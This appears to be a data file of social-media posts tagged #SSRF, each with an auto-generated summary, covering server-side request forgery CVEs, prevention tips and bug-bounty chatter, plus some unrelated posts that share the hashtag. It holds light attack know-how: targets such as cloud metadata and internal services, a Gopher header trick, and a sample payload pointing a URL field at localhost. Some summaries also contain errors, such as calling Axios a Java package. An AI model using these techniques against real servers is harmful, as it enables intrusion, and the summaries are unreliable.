492 | 2025-03-12 12:22:11 UTC | Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack | A coordinated cyber attack involving over 400 IPs exploiting multiple Server-Side Request Forgery (SSRF) vulnerabilities has been detected. SSRF vulnerabilities allow attackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or server compromise. The attack highlights the importance of addressing and patching vulnerabilities promptly to prevent exploitation. Vigilance and proactive security measures are crucial in defending against such coordinated cyber threats.
493 | 2025-03-12 11:11:46 UTC | Java Axios Package Vulnerability Threatens Millions of Servers with SSRF Exploit | A vulnerability in the Java Axios package poses a serious threat to millions of servers due to a Server-Side Request Forgery (SSRF) exploit. This vulnerability could allow attackers to manipulate a server into making unauthorized requests, potentially leading to data breaches or server compromise. Server administrators are advised to update their Java Axios package to the latest version to mitigate this security risk.
494 | 2025-03-12 11:11:44 UTC | Over 400 IPs Actively Exploiting Multiple SSRF Vulnerabilities in the Wild | The content highlights that more than 400 IPs are currently exploiting various Server-Side Request Forgery (SSRF) vulnerabilities in the wild. This indicates a significant threat to online security as attackers are actively targeting these vulnerabilities. It emphasizes the importance of addressing and patching SSRF vulnerabilities to prevent potential cyber attacks and protect sensitive data.
495 | 2025-03-12 10:01:51 UTC | 400 IPs Actively Exploiting Multiple SSRF Vulnerabilities In The Wild | Over 400 IPs are currently exploiting various Server-Side Request Forgery (SSRF) vulnerabilities in the wild. This poses a significant security risk as SSRF vulnerabilities can be used by attackers to manipulate server requests and potentially access sensitive information or execute unauthorized actions. It is crucial for organizations to promptly address and patch these vulnerabilities to prevent exploitation and safeguard their systems and data from potential breaches.
496 | 2025-03-12 09:28:41 UTC | Thread: #SSRF vulnerability in #Axios. The vulnerability has the identifier CVE-2025-27152 and a score of 7.7. An attacker can access internal network resources or sensitive information such as credentials. Affected versions: all versions up to 1.7.9. Fixed version: 1.8.2 or later #جاوااسکریپت #CVE | The content discusses a vulnerability in Axios marked as CVE-2025-27152 with a severity score of 7.7, allowing attackers to access internal network resources and sensitive information like credentials. Affected versions are up to 1.7.9, with the fixed version being 1.8.2 or newer. This vulnerability is related to SSRF (Server-Side Request Forgery) in JavaScript. It highlights the importance of updating to the patched version to mitigate the risk of unauthorized access to sensitive data.
497 | 2025-03-09 19:13:42 UTC | Common SSRF Attack Vectors: Internal APIs & cloud metadata services; Localhost services (127.0.0.1); Open Redirects & DNS rebinding; Misconfigured webhooks & integrations. Know your attack surface! #SSRF #CyberAwareness | The content discusses common Server-Side Request Forgery (SSRF) attack vectors, including targeting internal APIs, cloud metadata services, localhost services (127.0.0.1), open redirects, DNS rebinding, and misconfigured webhooks/integrations. It emphasizes the importance of understanding your attack surface to prevent SSRF attacks. The post raises awareness about cybersecurity and encourages vigilance against SSRF threats.
498 | 2025-03-09 19:13:42 UTC | What is Server-Side Request Forgery (SSRF)? SSRF tricks a server into making unintended requests, potentially bypassing security controls. Attackers can exploit this to: Access internal services; Bypass firewalls; Steal sensitive data. Stay alert! #CyberSecurity #SSRF | Server-Side Request Forgery (SSRF) tricks servers into making unintended requests, bypassing security controls. Attackers exploit this to access internal services, bypass firewalls, and steal sensitive data. Stay alert for SSRF threats in cybersecurity.
499 | 2025-03-08 05:04:17 UTC | Posted to Hatena Blog: What is the impact of SSRF attacks? - Shikata Ga Nai #セキュリティ #SSRF | The content posted on Hatena Blog discusses the impact of Server-Side Request Forgery (SSRF) attacks. The author, Shikata Ga Nai, explores the consequences of SSRF attacks in the realm of security. The post delves into the significance of understanding and mitigating SSRF vulnerabilities. The hashtags used are #セキュリティ (security) and #SSRF, indicating the focus on security-related topics and SSRF attacks.
500 | 2025-03-07 17:04:08 UTC | RibFest 2025: Master surgical stabilization of rib & sternal fractures. Join us on Aug 16 @StanfordMed for expert-led lectures & hands-on cadaver training. Limited spots available, register now. stanford.cloud-cme.com/course/courseo #SSRF #TraumaSurgery #CME @StanfordSurgery | RibFest 2025 at StanfordMed offers training in surgical stabilization of rib and sternal fractures on Aug 16. The event includes expert-led lectures and hands-on cadaver training. Limited spots are available, so registration is encouraged. The focus is on mastering trauma surgery techniques. Participants can register at stanford.cloud-cme.com/course/courseo. #SSRF #TraumaSurgery #CME @StanfordSurgery.
501 | 2025-03-06 05:58:39 UTC | My First Successful Bug Bounty Report! Super excited to share that I've successfully reported my first security vulnerability through a bug bounty program! Found a Unauthenticated Blind SSRF vulnerability and the report was accepted #BugBounty #ssrf | The content celebrates the author's first successful bug bounty report, where they discovered an Unauthenticated Blind SSRF vulnerability and had their report accepted. The author is excited to share this achievement through a bug bounty program. The post includes hashtags #BugBounty and #ssrf.
502 | 2025-03-03 10:43:16 UTC | My First Successful Bug Bounty Report! Super excited to share that I've successfully reported my first security vulnerability through a bug bounty program! Found a Unauthenticated Blind SSRF vulnerability and the report was accepted #BugBounty #ssrf | The content shares the author's excitement about successfully reporting their first security vulnerability through a bug bounty program. They discovered an Unauthenticated Blind SSRF vulnerability, and their report was accepted. The author highlights their achievement and uses hashtags like #BugBounty and #ssrf to share their experience.
503 | 2025-02-25 12:21:44 UTC | Sliver C2 Server Vulnerability Let Attackers Open a TCP connection to Read Traffic | The Sliver C2 Server vulnerability allows attackers to open a TCP connection to read traffic. This vulnerability poses a security risk as it enables unauthorized access to sensitive information. It is crucial for users of the Sliver C2 Server to be aware of this issue and take necessary precautions to prevent potential exploitation by malicious actors.
504 | 2025-02-24 21:13:57 UTC | SSRF Prevention Tip #4: Validate & sanitize user input! Reject non-HTTP/HTTPS URLs; Restrict port ranges; Use safe URL parsers to prevent bypasses. Security starts with input validation! #CyberSec #SSRF | The content emphasizes the importance of preventing Server-Side Request Forgery (SSRF) by validating and sanitizing user input. It suggests rejecting non-HTTP/HTTPS URLs, restricting port ranges, and using safe URL parsers to avoid bypasses. Highlighting that security begins with input validation, the post stresses the significance of these measures in cybersecurity. #CyberSec #SSRF.
505 | 2025-02-24 21:13:56 UTC | SSRF Prevention Tip #3: Never return raw responses! SSRF exploits often rely on getting API responses. Mask or sanitize responses to prevent attackers from extracting sensitive info! #SSRF #APIsecurity | Tip #3 for preventing Server-Side Request Forgery (SSRF) attacks advises against returning raw API responses to thwart attackers from extracting sensitive information. Masking or sanitizing responses is recommended to enhance security and protect against SSRF exploits. This precaution helps safeguard against potential vulnerabilities and ensures API security.
506 | 2025-02-24 21:13:56 UTC | SSRF Prevention Tip #1: Use an allowlist for external domains! Only permit URLs from trusted sources (e.g. Google Drive, Gravatar). Block unknown origins to prevent malicious requests. #AppSec #SSRF | The content provides a tip for preventing Server-Side Request Forgery (SSRF) attacks by using an allowlist for external domains. It suggests allowing only URLs from trusted sources like Google Drive and Gravatar while blocking unknown origins to avoid malicious requests. This practice enhances application security and helps mitigate the risk of SSRF vulnerabilities. The use of an allowlist is recommended to restrict access to specific domains, reducing the attack surface and protecting against unauthorized requests. #AppSec #SSRF.
507 | 2025-02-24 21:13:55 UTC | Real-World SSRF Attack A social network lets users upload profile pictures via a URL. An attacker submits: 📌 "picture_url": "http://localhost:8080" 📌 API unintentionally scans internal ports! 🚨 #SSRF #CyberThreats — Otesile Olaoluwa (@OtesileOlaoluwa) February 24, 2025 | The content discusses a real-world Server-Side Request Forgery (SSRF) attack on a social network that allows users to upload profile pictures via a URL. The attacker submitted a malicious URL pointing to "http://localhost:8080," triggering the API to unintentionally scan internal ports. This incident highlights the vulnerability of SSRF attacks and the potential cybersecurity threats they pose. The tweet warns about the attack and raises awareness about the importance of safeguarding against such cyber threats.
508 | 2025-02-24 21:13:54 UTC | What is SSRF? Server-Side Request Forgery (SSRF) lets attackers force an API to fetch remote resources without validation. This can bypass firewalls, expose sensitive data and even lead to DoS attacks. #CyberSecurity #SSRF | SSRF, or Server-Side Request Forgery, allows attackers to manipulate APIs to access remote resources without validation. This vulnerability can circumvent firewalls, compromise sensitive data, and potentially trigger denial-of-service (DoS) attacks. It poses significant cybersecurity risks and requires attention to prevent exploitation.
509 | 2025-02-22 16:04:24 UTC | SSRF challenge cracked on TryHackMe! Learned how insecure server-side requests can expose internal systems. Hack, learn, secure, repeat! #CyberSecurity #SSRF #TryHackMe #BugBounty tryhackme.com/r/room/ssrfqi? | The content discusses successfully completing an SSRF challenge on TryHackMe, highlighting the risks of insecure server-side requests exposing internal systems. The message emphasizes the importance of learning, securing, and repeating the process. It also mentions cybersecurity, SSRF, TryHackMe, and Bug Bounty. The link provided directs to the TryHackMe room for the SSRF challenge.
510 | 2025-02-20 12:58:32 UTC | SSRF flaw in Sliver C2 teamserver lets attackers spoof callbacks (CVE-2025-27090). Patch now to avoid compromise! #SSRF #Cybersecurity #Vulnerability | A Server-Side Request Forgery (SSRF) flaw in Sliver C2 teamserver allows attackers to spoof callbacks (CVE-2025-27090). It is crucial to patch this vulnerability immediately to prevent potential compromise. Stay vigilant about cybersecurity threats and take necessary actions to secure your systems. #SSRF #Cybersecurity #Vulnerability.
511 | 2025-02-18 17:48:53 UTC | Explore "Hacking Layer 7" for insights on web vulnerabilities and defenses. ethicbreach.com/2025/02/18/app #ethicbreach #L7Hack #CyberSec #EthHack #WebSec #AppSec #OWASP #Inject #Srvr #Clnt #SMTP #DNS #FTP #SSRF #Hdrs #Vldtn #SecCode Follow for insights, like if helpful! | The content discusses exploring "Hacking Layer 7" for insights on web vulnerabilities and defenses, with hashtags related to cybersecurity topics. It encourages following for helpful insights. The link provided directs to a webpage for further information. Key points include focusing on Layer 7 vulnerabilities, using relevant hashtags, and promoting engagement for cybersecurity insights.
512 | 2025-02-17 19:43:33 UTC | #ssrf Your First Critical Bug Bounty! SSRF Hunting Made Easy youtu.be/bSn7tWFP354?fe via @YouTube | The content discusses finding Server-Side Request Forgery (SSRF) vulnerabilities for bug bounties, providing tips and guidance for beginners. It highlights a video tutorial on SSRF hunting, aiming to make the process easier. The link leads to a YouTube video offering insights on identifying and exploiting SSRF vulnerabilities. The content emphasizes the importance of SSRF as a critical bug bounty target and suggests resources for learning more about this type of vulnerability.
513 | 2025-02-17 10:48:18 UTC | Common application #vulnerabilities attacks: - path/directory traversal - session hijacking - #CSRF - #DDOS - #IDOR - #CRLF - race condition (TOCTTOU) - insecure deserialization (object injection) - forced browsing (url not restricted) - #XXE - #SSRF | The content discusses common application vulnerabilities attacks such as path/directory traversal, session hijacking, CSRF, DDoS, IDOR, CRLF, race condition, insecure deserialization, forced browsing, XXE, and SSRF. These vulnerabilities can be exploited by attackers to compromise the security of applications. It is crucial for developers and organizations to be aware of these vulnerabilities and implement proper security measures to protect their applications from potential attacks.
514 | 2025-02-17 09:43:50 UTC | New Writeup Alert! "SSRF Advanced Methodology" by Abhijeet kumawat is now live on IW! Check it out here: infosecwriteups.com/ecbe289886ef #money #infosec #ssrf #hacking #bugbounty | Abhijeet Kumawat's new writeup on "SSRF Advanced Methodology" is now available on IW. The content covers SSRF techniques and bug bounty hunting related to hacking and information security. Readers can access the writeup at infosecwriteups.com/ecbe289886ef. The post is aimed at those interested in money, infosec, SSRF, hacking, and bug bounty programs.
515 | 2025-02-16 06:38:25 UTC | 4/7 From code injection to #SQL attacks @Microsoft wants your help finding vulnerabilities in Copilot AI. Report issues like #SSRF or authentication flaws and earn rewards! #Cybersecurity #AI #BugHunting | Microsoft is seeking help to identify vulnerabilities in Copilot AI, offering rewards for reporting issues like code injection, SQL attacks, SSRF, and authentication flaws. This initiative aims to enhance cybersecurity by addressing potential weaknesses in the AI system. Bug hunters can contribute to improving the security of Copilot AI and earn rewards for their efforts.
516 | 2025-02-15 14:38:46 UTC | @kcsfa There is a misconfiguration that could lead to password #bruteforce, Server side requests forgery #ssrf that could leak internal IP's and lead to #RCE #API { "id": 1, "name": "c", "url": "", "description": "", "link ........ } | The content warns about a misconfiguration that could result in password brute-forcing, server-side request forgery (SSRF) leading to leaking internal IPs, and remote code execution (RCE) via API. It includes a snippet of code with an ID, name, URL, and description. The post emphasizes the potential security risks associated with the mentioned misconfiguration.
517 | 2025-02-12 05:23:04 UTC | So proud of the amazing surgeon-scientists who made this @JTraumAcuteSurg publication happen. My @CWISociety colleagues are amazing! #ssrf #chestwallinjury #cwismemberresearch | The content expresses pride in surgeon-scientists for their publication in the Journal of Trauma and Acute Care Surgery. The author commends their colleagues from the Chest Wall Injury Society for their work. The hashtags #ssrf, #chestwallinjury, and #cwismemberresearch are used to highlight the research and collaboration.
518 | 2025-02-11 08:18:35 UTC | The vulnerability CVE-2025-25065 is of type #SSRF and has a score of 5.3. The vulnerability is in the RSS feed parser and allows unauthorized redirection to endpoints inside the network. Fixed versions: 9.0.0 Patch 43 10.0.12 10.1.4 | The vulnerability CVE-2025-25065 is an SSRF type with a severity score of 5.3. It affects an RSS feed parser allowing unauthorized redirects to network endpoints. The patched versions are 9.0.0 Patch 43, 10.0.12, and 10.1.4.
519 | 2025-02-10 17:19:14 UTC | #Zimbra Releases# Security Updates for #SQL_Injection #Stored_XSS and #SSRF #Vulnerabilities | Zimbra has released security updates addressing SQL injection, stored XSS, and SSRF vulnerabilities. These updates aim to enhance the security of the Zimbra platform by fixing these critical issues. Users are advised to promptly apply the updates to protect their systems from potential exploitation.
520 | 2025-02-10 16:19:01 UTC | Warning: Critical and Medium Improper Neutralization in SQL command and Server-Side Request Forgery #SSRF in #Zimbra #SyncService #Zimbracollaboration #CVE-2025-25064 #CVE-2025-25065 CVSS: 9.8-5.3. An attacker can execute an SQL injection to exploit these vulnerabilities. #Patch | The content warns of critical and medium vulnerabilities related to improper neutralization in SQL commands and Server-Side Request Forgery (#SSRF) in Zimbra's SyncService and Zimbra collaboration. The vulnerabilities are identified as CVE-2025-25064 and CVE-2025-25065 with CVSS scores of 9.8 and 5.3. An attacker could exploit these vulnerabilities through SQL injection. A patch is recommended to address these security issues.
521 | 2025-02-10 14:52:09 UTC | Microsoft SharePoint Connector Vulnerability Let Attackers Steal Users' Credentials | A vulnerability in Microsoft SharePoint Connector allows attackers to steal users' credentials. This security flaw poses a risk of unauthorized access to sensitive information. It is crucial for users to be aware of this issue and take necessary precautions to protect their credentials and data. Microsoft may release patches or updates to address this vulnerability, and users should stay informed and implement any recommended security measures promptly.
522 | 2025-02-10 12:18:40 UTC | ZIMBRA RELEASES SECURITY UPDATES FOR SQL INJECTION XSS AND SSRF VULNERABILITIES #SamirNews #zimbra #libera #atualizações #de #segurança #para #injeção #de #sql #xss #e #vulnerabilidades #ssrf | Zimbra has released security updates addressing SQL injection, XSS, and SSRF vulnerabilities. The updates aim to enhance security measures against these potential threats. The announcement was made through the #SamirNews platform and includes hashtags related to Zimbra, security updates, SQL injection, XSS, and SSRF vulnerabilities.
| 523 | 2025-02-10 10:01:38 UTC | Zimbra Releases Security Updates for SQL Injection Stored XSS and SSRF Vulnerabilities | Zimbra has issued security updates to address SQL Injection, Stored XSS, and SSRF vulnerabilities. These updates aim to enhance the security of the Zimbra platform and protect users from potential exploitation of these vulnerabilities. Users are advised to promptly apply the updates to safeguard their systems and data from security risks. |
| 524 | 2025-02-07 10:08:25 UTC | Preventing SSRF at the Application Layer Validate & sanitize user input Use an allow-list for URLs ports & destinations Disable HTTP redirections Be cautious of DNS rebinding & TOCTOU race conditions Secure coding saves lives! #DevSecOps #SSRF | To prevent Server-Side Request Forgery (SSRF) at the application layer, validate and sanitize user input, use an allow-list for URLs, ports, and destinations, disable HTTP redirections, and be cautious of DNS rebinding and TOCTOU race conditions. Secure coding practices are crucial for preventing SSRF incidents. The content emphasizes the importance of DevSecOps and implementing these measures to enhance security and protect against SSRF vulnerabilities. |
| 525 | 2025-02-07 10:08:24 UTC | How does SSRF work? A web app fetches a remote resource without validating the user-supplied URL. Attackers exploit this to send malicious requests accessing internal services metadata & even causing RCE! #AppSec #SSRF | SSRF (Server-Side Request Forgery) occurs when a web app fetches a remote resource without validating the user-supplied URL. Attackers exploit this vulnerability to send malicious requests, accessing internal services, metadata, and potentially causing Remote Code Execution (RCE). Proper validation of user input is crucial to prevent SSRF attacks. #AppSec #SSRF |
| 526 | 2025-02-06 22:16:37 UTC | Microsoft SharePoint Connector Flaw Could've Enabled Credential Theft Across Power Platform | A vulnerability in the Microsoft SharePoint Connector could have allowed attackers to steal credentials across the Power Platform. This flaw posed a security risk by potentially enabling unauthorized access to sensitive information. Microsoft has likely addressed this issue to prevent credential theft and enhance the security of the Power Platform. |
| 527 | 2025-02-06 18:03:47 UTC | SSRF attacks can cripple your Go apps. Learn how to prevent them with this step-by-step guide & code examples. #golang #security #SSRF snyk.co/uh2GO | The content discusses how Server-Side Request Forgery (SSRF) attacks can harm Go applications and provides a step-by-step guide with code examples to prevent them. It emphasizes the importance of securing Go apps against SSRF attacks for enhanced security. The guide aims to help developers understand and implement measures to safeguard their applications from potential vulnerabilities. The content is relevant for those working with Go programming language and interested in enhancing the security of their applications. |
| 528 | 2025-02-05 23:03:49 UTC | 2/8 How does the SharePoint vulnerability work? Attackers could exploit Server-Side Request Forgery (SSRF) to inject malicious URLs steal JWT tokens and make unauthorized #API requests. A serious risk for organizations using Power Platform! #CyberThreat #SSRF #API | The SharePoint vulnerability allows attackers to use Server-Side Request Forgery (SSRF) to inject malicious URLs, steal JWT tokens, and make unauthorized API requests. This poses a significant risk to organizations using the Power Platform. The exploit highlights the importance of addressing cybersecurity threats like SSRF. |
| 529 | 2025-02-05 08:58:48 UTC | Learn how to master SSRF Vulnerabilities with our step-by-step guide using PortSwigger Labs! Dive deep into the process and sharpen your skills. #SSRF #CyberSecurity #WebAppSecurity #cybersecurityskills #EthicalHacking #TrendingNow | Master SSRF vulnerabilities with a step-by-step guide using PortSwigger Labs to enhance cybersecurity skills. Dive deep into the process for ethical hacking and web app security. Trending topic in cybersecurity. #SSRF #CyberSecurity #WebAppSecurity #cybersecurityskills #EthicalHacking |
| 530 | 2025-02-05 05:58:39 UTC | SSRF: Anatomy of a Cloud Attack @ Cloud Village \| @seasides_conf 2025! Join @Zero0x00 as he explores SSRF attacks with Burp Suite & AWS Metadata. A must-attend for cloud security pros! 22 Feb 2025 #CloudSecurity #SSRF #Seasides2025 | The content discusses an upcoming session at the Cloud Village event at the Seasides Conference 2025, focusing on SSRF attacks using Burp Suite and AWS Metadata. Led by @Zero0x00, the session is aimed at cloud security professionals and is scheduled for February 22, 2025. It emphasizes the importance of understanding SSRF attacks in cloud security. Attendees are encouraged to join to gain insights into this critical aspect of cloud security. |
| 531 | 2025-02-04 03:53:45 UTC | [A Practical Guide] Exploiting SSRF with Filter Bypass via Open Redirection Source: link.medium.com/HVR71xVBHQb #ssrf #openredirect #ssrfexploitation #openredirectexploitation #ssrffilterbypass #bugbounty #bugbountytips | The content provides a practical guide on exploiting Server-Side Request Forgery (SSRF) with filter bypass using open redirection. It discusses techniques to bypass filters and exploit vulnerabilities related to SSRF and open redirection. The focus is on bug bounty tips and strategies for exploiting SSRF vulnerabilities effectively. The content aims to provide insights and practical guidance for security researchers and bug bounty hunters interested in SSRF exploitation. |
| 532 | 2025-02-03 18:53:46 UTC | New episode on YouTube! How does SSRF (Server-Side Request Forgery) work and how can attackers manipulate HTTP requests? See how to detect and test for this vulnerability! Watch now: #SSRF #Cybersecurity #BurpSuite #Pentesting #WebSecurity | The content discusses a new YouTube episode about SSRF (Server-Side Request Forgery), explaining how attackers manipulate HTTP requests and how to detect and test this vulnerability. It invites viewers to watch the episode to learn more about SSRF, cybersecurity, BurpSuite, pentesting, and web security. The link provided directs viewers to the YouTube video. |
| 533 | 2025-02-02 12:48:51 UTC | CVE-2024-54819 - I Librarian Server Side Request Forgery #CVE202454819 #ILibrarian #SSRF #Cybersecurity #Vulnerability | The content discusses a specific cybersecurity vulnerability identified as CVE-2024-54819 in I Librarian, related to Server Side Request Forgery (SSRF). The vulnerability is highlighted with relevant hashtags for tracking and awareness. For more details, the link provided can be accessed for additional information. |
| 534 | 2025-02-01 15:43:48 UTC | Looking for a Burp Collaborator alternative for SSRF testing? Bug bounty hunters & pentesters Interactsh is a must-have for SSRF exploitation web security and bug bounties. #BugBounty #PenetrationTesting #SSRF #HackingTools #ProjectDiscovery | Interactsh is recommended as a Burp Collaborator alternative for SSRF testing by bug bounty hunters and pentesters. It is considered essential for SSRF exploitation, web security, and bug bounties. The tool is highlighted for its effectiveness in these areas and is associated with Bug Bounty, Penetration Testing, SSRF, Hacking Tools, and Project Discovery. |
| 535 | 2025-02-01 07:38:24 UTC | To mitigate SSRF exploitation, the Google Cloud metadata service also requires an added HTTP header, because in a typical SSRF, especially web exploitation, the HTTP headers are not controllable. I recently saw an exploitation technique: if the Gopher protocol is supported, then since Gopher supports constructing TCP packets, constructing HTTP header fields is no problem either. #SSRF #CloudSec | Google Cloud's metadata service is enhancing security against SSRF attacks by requiring an additional HTTP header. SSRF exploits, especially in web contexts, often involve uncontrollable HTTP headers. A recent discovery suggests that supporting the Gopher protocol could be exploited, as Gopher allows crafting TCP packets, making manipulation of HTTP header fields feasible. This measure aims to mitigate SSRF vulnerabilities in cloud environments. #SSRF #CloudSec |
| 536 | 2025-01-30 03:28:28 UTC | #For_puja #flower selection #how #should_it_be_done? #flower #puja #pooja #peace #ssrf.org # Flowers should be plucked while chanting the name of our favourite deity. Read in detail Subscribe to Our Telegram Channel | The content discusses the selection and offering of flowers for worship (#ಪೂಜೆಗಾಗಿ #ಹೂಗಳ ಆಯ್ಕೆ #ಹೇಗೆ #ಮಾಡಬೇಕು). It emphasizes the importance of offering flowers while chanting the name of one's favorite deity for peace. The content also encourages readers to subscribe to their Telegram channel for more details. The key points include flower selection for worship, chanting names of deities while offering flowers, and a call to subscribe for further information. |
| 537 | 2025-01-29 10:23:23 UTC | Hey @deepseek_ai are you guys paying for Read SSRF vulnerability? I also got 56 XSS manually and was able to automate it to A&T. Let me know. #XSS #DeepSeekV3 #DeepSeek #ssrf #bugbountytips #BugBounty | The content is a message directed at @deepseek_ai asking if they pay for SSRF vulnerabilities. The sender mentions discovering 56 XSS vulnerabilities manually and automating them to A&T. They invite @deepseek_ai to contact them. The message includes hashtags related to XSS, DeepSeek, SSRF, bug bounty tips, and Bug Bounty. |
| 538 | 2025-01-28 21:23:59 UTC | Critical SSRF vulnerability discovered in Microsoft Purview: what you need to know #CVE-2025-21385 #Microsoft Purview vulnerability #SSRF-aanval #beveiligingsupdate #cybersecurity #Trending #Tech #Nieuws | A critical SSRF vulnerability in Microsoft Purview has been discovered, tagged as #CVE-2025-21385. This vulnerability poses a risk of SSRF attacks, emphasizing the importance of applying security updates promptly. The news highlights the significance of cybersecurity in tech trends. Stay informed and vigilant to protect systems from potential exploits. |
| 539 | 2025-01-28 20:23:15 UTC | Smol TryHackMe Writeup #smol #writeup #tryhackme #SSRF #WordPress #JSmol2WP #RCE #john #SUDO | The content is a brief writeup about a TryHackMe challenge named "Smol." It likely covers topics such as Server-Side Request Forgery (SSRF), WordPress vulnerabilities, JSmol2WP, Remote Code Execution (RCE), John the Ripper (password cracking tool), and SUDO privilege escalation. The writeup may provide insights into how these concepts were utilized to solve the challenge. The link provided seems to direct to the full writeup for those interested in detailed information. |
| 540 | 2025-01-28 19:23:36 UTC | I sent an #ssrf report to a program that pays bounties; after 10 days the program's team replied that it's client-side and that something like a clipboard manager on your system is making the request. Well, you bastard, you didn't test it, so why are you talking rubbish? Not even rubbish, really; what are you on about? #باگ_بانتی | The content discusses sending an SSRF report to a program's team, receiving a response after 10 days mentioning a client-side issue with a clipboard manager making requests. The author questions why proper testing was not conducted before reporting the issue. The post includes hashtags related to bug reporting. |
| 541 | 2025-01-28 16:23:41 UTC | Warning: Recent security update in #Kibana fixes #CVE-2024-43707 & #CVE-2024-43710. #Update to version 8.15.0 #SSRF #exposure of #sensitive #information #Patch #Patch #Patch | A recent security update in Kibana addresses CVE-2024-43707 and CVE-2024-43710, fixing vulnerabilities related to SSRF and exposure of sensitive information. Users are advised to update to version 8.15.0 to patch these issues. It is crucial to apply the patch promptly to protect against potential security threats. |
| 542 | 2025-01-25 11:13:52 UTC | Important information about the server-side request forgery vulnerability in Microsoft Purview: CVE-2025-21385 https://t.co/SMmCXDhzNB #CVE-2025-21385 #Microsoft Purview #SSRF vulnerability #Cybersecurity #Informatiebeveiliging #Trending #Tech #Nieuws | The content discusses a significant server-side request forgery vulnerability in Microsoft Purview with the CVE-2025-21385 identifier. It emphasizes the importance of this vulnerability in terms of cybersecurity and information security. The post is trending in the tech news and highlights the need for attention to this issue. The link provided likely directs to more detailed information about the vulnerability. |
| 543 | 2025-01-25 11:13:51 UTC | Critical SSRF vulnerability discovered in Microsoft Purview: protect your data vulnerability Purview security -2025-21385 protection update | A critical SSRF vulnerability in Microsoft Purview has been discovered, emphasizing the importance of protecting data. The vulnerability is identified as CVE-2025-21385, highlighting the need for security updates to safeguard network data. This news is trending in the tech community, urging users to take necessary precautions to enhance Microsoft Purview security. |
| 544 | 2025-01-24 18:13:24 UTC | Check out this article to learn how to find and exploit server-side request forgery (SSRF) vulnerabilities in an API. | The article provides guidance on identifying and exploiting server-side request forgery (SSRF) vulnerabilities in an API. It offers insights into detecting and leveraging these vulnerabilities for potential exploitation. The focus is on understanding SSRF risks and how they can be manipulated to compromise server security. The article aims to educate readers on the significance of addressing SSRF vulnerabilities to enhance API security. It is recommended for those interested in API hacking and SSRF mitigation strategies. |
| 545 | 2025-01-24 01:04:24 UTC | SSRF vulnerability CVE-2025-23082 in Veeam Backup for Microsoft Azure has been fixed: apply the patch immediately https://t.co/LfvchcrE5k A vulnerability has been reported in Veeam Backup for Azure. Teams using it should hurry to update to the latest build #Cloud #CVE202523082 #SSRF #Veeam | Veeam Backup for Microsoft Azure has a SSRF vulnerability (CVE-2025-23082) that requires immediate patching. Users are advised to update to the latest build promptly to address this vulnerability. The vulnerability affects Veeam Backup for Azure, and users are urged to apply the patch quickly. #Cloud #CVE202523082 #SSRF #Veeam |
| 546 | 2025-01-23 04:58:54 UTC | SSRF 101! Don't let attackers turn your server into a proxy! Learn the basics of Server-Side Request Forgery and how to prevent it from happening to you! #SSRF #CyberSecurity #WebSecurity | The content emphasizes the importance of understanding Server-Side Request Forgery (SSRF) to prevent attackers from exploiting it to turn a server into a proxy. It encourages learning the basics of SSRF to enhance cybersecurity and web security. The post aims to raise awareness about SSRF risks and the measures to mitigate them. #SSRF #CyberSecurity #WebSecurity. |
| 547 | 2025-01-23 04:58:53 UTC | Warning! Server-Side Request Forgery (SSRF) attacks can trick your server into making unauthorized requests! Validate user input use whitelisting & monitor logs to stay safe! #SSRF #CyberSecurity #WebSecurity | The content warns about Server-Side Request Forgery (SSRF) attacks that manipulate servers into making unauthorized requests. To prevent SSRF attacks, it advises validating user input, implementing whitelisting, and monitoring logs. These measures enhance cybersecurity and web security. It emphasizes the importance of safeguarding servers against SSRF attacks by taking proactive security measures. |
| 548 | 2025-01-22 04:41:20 UTC | External Threat Landscape Management \| Attack surface \| Brand \| Vulnerability | The content discusses the importance of managing the external threat landscape, focusing on areas such as attack surface, brand protection, and vulnerability management. It likely delves into strategies for identifying and mitigating potential threats to an organization's security and reputation. The link provided may offer further insights or resources related to this topic. |
| 549 | 2025-01-20 23:53:42 UTC | Day 15: XXE SSRF! Discovered how XXE can lead to SSRF allowing attackers to access internal systems or sensitive data. Always validate XML input and disable external entities! #BugBounty #XXE #SSRF #CyberSecurity #InfoSec https://t.co/UspwIegXyp | The content discusses the discovery of how XXE (XML External Entity) vulnerabilities can lead to SSRF (Server-Side Request Forgery), enabling attackers to access internal systems or sensitive data. It emphasizes the importance of validating XML input and disabling external entities to prevent such attacks. The post also includes hashtags related to Bug Bounty, XXE, SSRF, Cybersecurity, and InfoSec. |
| 550 | 2025-01-20 18:58:50 UTC | HAPPY BIRTHDAY BHAI 🤗💝 We miss you, You will live in our Hearts Forever 💞 My Best Love To You. ❤️ | The content is a birthday tribute to Sushant Singh Rajput, expressing love and remembrance. The message conveys heartfelt sentiments, stating "HAPPY BIRTHDAY BHAI @itsSSR 🤗💝 We miss you, You will live in our Hearts Forever 💞 My Best Love To You. ❤️" The post is shared in honor of Sushant Day, using hashtags #SushantSinghRajput and #SSRF, along with a link to an image. |
| 551 | 2025-01-20 18:46:36 UTC | Multiple Azure DevOps Vulnerabilities Let Inject CRLF Queries & Rebind DNS | Multiple vulnerabilities in Azure DevOps allow attackers to inject CRLF queries and rebind DNS. These vulnerabilities can potentially be exploited to compromise the security of Azure DevOps systems. It is crucial for users to be aware of these vulnerabilities and take necessary precautions to prevent unauthorized access and protect sensitive data. |
| 552 | 2025-01-18 23:48:42 UTC | : A Deep Dive into and Mitigations for and | The content explores Server-Side Request Forgery (SSRF) cyber risks for software and web developers, providing a deep dive into the topic. It emphasizes the importance of understanding SSRF vulnerabilities and offers mitigations to address these risks. The focus is on enhancing security measures to protect against SSRF attacks, aiming to assist developers in safeguarding their systems and applications. |
| 553 | 2025-01-18 23:48:40 UTC | : A Deep Dive into and Mitigations for and | The content discusses Server-Side Request Forgery (SSRF), highlighting cyber risks it poses to software and web developers. It delves into the importance of understanding and mitigating SSRF vulnerabilities to enhance security. The post provides insights and strategies for developers to secure their systems against SSRF attacks. It emphasizes the need for developers to be vigilant and proactive in addressing SSRF risks to protect their software and websites from potential exploitation. The content aims to raise awareness about SSRF vulnerabilities and offers guidance on how developers can safeguard their systems. |
| 554 | 2025-01-17 20:43:22 UTC | Remember: #SSRF isn't just about making HTTP calls! Think broader - SMTP enumeration Redis unauthorized access internal Kibana instances Jenkins panels. The internal network is full of sensitive services! #BugBounty #HackingTips #CyberSecurity | The content emphasizes that Server-Side Request Forgery (#SSRF) extends beyond HTTP calls to include SMTP enumeration, unauthorized access to Redis, internal Kibana instances, and Jenkins panels. It highlights the presence of sensitive services within internal networks, urging a broader perspective for identifying vulnerabilities. The post is tagged with #BugBounty, #HackingTips, and #CyberSecurity. |
